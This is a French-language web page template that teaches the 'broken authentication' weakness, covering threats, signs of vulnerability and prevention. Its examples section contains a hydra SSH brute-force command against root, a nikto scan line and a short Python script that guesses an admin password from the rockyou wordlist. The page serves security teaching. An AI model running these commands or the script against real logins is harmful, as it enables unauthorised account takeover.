{% extends 'base.html' %}
{% block title %}broken authentication{% endblock title %}
{% block content %}
  {% if user.is_authenticated %}
    <!-- navbar navbar-expand-sm -->
      <nav class="navbar navbar-expand-sm navbar-dark bg-secondary col sticky-top mt-56" style="z-index:100;">
      <a class="navbar-brand" href="#">broken authentication</a>

      <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav mr-auto">
          <li class="nav-item active">
            <a class="nav-link" href="#">Explication</a>
          </li>
          <li class="nav-item active">
            <a class="nav-link" href="#exemple">Exemples</a>
          </li>
          <li class="nav-item active">
            <a class="nav-link" href="#prevention">Prévention</a>
          </li>
        </ul>
      </div>
    </nav>
    <div class="col-sm-10 p-3 ml-5  mt-9">
      <div id='explication' class="text-justify mb-4 pt-104 ">
        <div class='mt-4 '>
          <h2  class='ml-5 mb-3'>Explication</h2>
          <p>Les fonctions d'application liées à l'authentification et à la gestion de session sont souvent implémentées de manière incorrecte, permettant aux attaquants de compromettre les mots de passe, les jetons de session, ou d'exploiter d'autres failles d'implémentation pour assuré l'identité des autres utilisateurs de manière temporaire ou permanente.
          </p>
        </div>
        <div class='mt-4 mb-5 ml-4'>
          <ul>
             <li>
               <strong>Agents de menace et vecteurs d'attaque :</strong>
               <p>
              les attaquants ont accès à des centaines de millions de combinaisons de nom d'utilisateur et de mot de passe valides pour le bourrage des informations d'identification, les listes de comptes administratifs par défaut on appelle sa un "dictionnaire". Les attaques de gestion de session sont bien réel, en particulier en ce qui concerne les jetons de session non expirés.
              </p>
             </li>
             <li>
               <strong>Faiblesses en matière de sécurité : </strong>
               <p>
                 La prévalence de l'authentification rompue est répandue en raison de la conception et de la mise en œuvre de la plupart des contrôles d'identité et d'accès. La gestion de session est le fondement des contrôles d'authentification et d'accès et est présente dans toutes les applications avec état. Les attaquants peuvent détecter une authentification rompue à l'aide de moyens manuels et les exploiter à l'aide d'outils automatisés avec des listes de mots de passe et des attaques par dictionnaire.
               </p>
             </li>
             <li>
               <strong>Impacts :</strong>
               <p>
                 les attaquants doivent avoir accès à seulement quelques comptes ou à un seul compte administrateur pour compromettre le système. Selon le domaine de l'application, cela peut permettre le blanchiment d'argent, la fraude à la sécurité sociale et le vol d'identité, ou divulguer des informations hautement sensibles protégées par la loi.
               </p>
             </li>
          </ul>
        </div>
        <div class='mt-4'>
          <h5> L'application est-elle vulnérable?</h5>
          <br>
          <div class='ml-4'>
            <p>
              La confirmation de l'identité, de l'authentification et de la gestion de session de l'utilisateur sont essentielles pour se protéger contre les attaques liées à l'authentification. Il peut y avoir des faiblesses d'authentification si l'application:
              <ul  style=''>
                <li>
                  Autorise les attaques automatisées telles que le bourrage d'information d'identification , où l'attaquant possède une liste de noms d'utilisateur et de mots de passe valides.
                </li>
                <li class="mt-2">
                  Autorise la force brute ou d'autres attaques automatisées.
                </li>
                <li class="mt-2">
                  Autorise les mots de passe par défaut, faibles ou bien connus, tels que «Password1» ou «admin / admin».
                </li>
                <li class="mt-2">
                Utilise une récupération des informations d'identification faible ou inefficace et des processus de mot de passe oublié, tels que les «réponses basées sur les connaissances», qui ne peuvent pas être sécurisées.
                </li>
                <li class="mt-2">
                Utilise du texte brut, des mots de passe chiffrés ou faiblement hachés
                </li>
                <li class="mt-2">
                A une authentification multi facteur manquante ou inefficace.
                </li>
                <li class="mt-2">
                Expose les ID de session dans l'URL (par exemple, réécriture d'URL).
                </li>
                <li class="mt-2">
                Ne fait pas pivoter les ID de session après une connexion réussie.
                </li>
                <li class="mt-2">
                  N'invalide pas correctement les ID de session. Les sessions utilisateur ou les jetons d'authentification (en particulier les jetons d'authentification unique (SSO)) ne sont pas correctement invalidés pendant la déconnexion ou une période d'inactivité.
                </li>
              </ul>
            </p>
          </div>
        </div>
      </div>
      <hr/>
      <div class=" mb-4 mt-5">
        <h2 id='exemple'class='ml-5 mb-3'>Exemples</h2>
        <div class=''>
          <p>
            L'attaquant va alors utiliser pour la plus part du temps un outils, ou un script permettant l'utilisation d'un dictionnaire ou non et lancer plusieurs requêtes jusqu'à deviner le mot de passe.
          </p>
          <p>
            Sur un formulaire d'authentification, on peut utiliser comme outils "nikto" qui à une fonctionnalité de testé en bruteforce certain couple de mot de passe.
          </p>
          <div class="bg-light ">
            <code >
              nikto -h www.leformulaire.com
            </code>
          </div>
          <p>
            Pour le SSH on peut par exemple utiliser "hydra".
          </p>
          <div class="bg-light ">
            <code >
              hydra -l root -P "dico" -s 22 -f "IPduServeurSSH" ssh
            </code>
          </div>
          <p>
            On peut aussi utiliser des scripts personnalisés pour attaquer un formulaire login/password.
          </p>
          <p>
            Prenons l'exemple d'un site web, on imagine que l'utilisateur que l'on souhaite pirater est "admin", on ne connait pas sont mot de passe. Ce script, permet l'utilisation d'un bibliothèque connus, ici, rockyou pour testé chaque couple admin/motdepasse, on utiliseras python ainsi que la librairie "request".
          </p>
          <div class="bg-light ">
            <code >
              #!/usr/bin/python <br>
              import requests<br>
              import re<br>

              f = open("rockyou-75.txt","r").read().split('\n')<br>
              compteur = 0<br>

              for i in f:<br>
              <div class='ml-5'>
              	session = requests.Session()<br>
              	r = session.get('http://lesite.com')<br>
              	data = {<br>
                <div class='ml-5'>
                      	 "useralias" : "admin",<br>
                      	 "password" :  i,<br>
                      	 }<br>
                </div>
              	url = "http://lesite.com"<br>
              	r = session.post(url,data=data)<br>
              	if "MauvaisMdp." in r.text:<br>
                  <div class='ml-5'>
                		print str(compteur) + '\r'<br>
                		compteur+=1<br>
                  </div>
              	else:
                  <div class='ml-5'>
                		print "BonMdp: " + i<br>
                		exit()<br>
                  </div>
                </div>
            </code>
          </div>
          <!-- <img src="" height="420" width="500" class="mb-4 center" /> -->
        </div>
      </div>
      <hr/>
      <div class=" mb-4">
        <h2 id='prevention' class='ml-5 mb-3'>Prévention</h2>
        <p>
        Dans la mesure du possible, implémentez l'authentification multifacteur pour empêcher les attaques automatisées de bourrage d'informations d'identification, de force brute et de réutilisation des informations d'identification volées.
        </p>
        <p>
          Implémentez des vérifications de mots de passe faibles, telles que le test de mots de passe nouveaux ou modifiés par rapport à une liste des 10000 mots de passe les plus faible.
        </p>
        <p>
          Assurez-vous que les chemins d'enregistrement, de récupération des informations d'identification et d'API sont renforcés contre les attaques d'énumération de compte en utilisant les mêmes messages pour tous les résultats.
        </p>
        <p>
          Limitez ou retardez de plus en plus les tentatives de connexion infructueuses. Consignez toutes les pannes et alertez les administrateurs lorsque le bourrage d'informations d'identification, la force brute ou d'autres attaques sont détectés.
        </p>
        <p>
          Utilisez un gestionnaire de session intégré et sécurisé côté serveur qui génère un nouvel ID de session aléatoire avec une entropie élevée après la connexion. Les ID de session ne doivent pas figurer dans l'URL, être stockés de manière sécurisée et invalidés après déconnexion, inactivité et délais d'expiration.
        </p>
      </div>
    </div>
  {% else %}
    <div class='col-sm-10 p-3 ml-5  mt-5'>
      <p>connecte toi pour pouvoir acceder a cette page</p>
    <div>
  {% endif %}
{% endblock %}
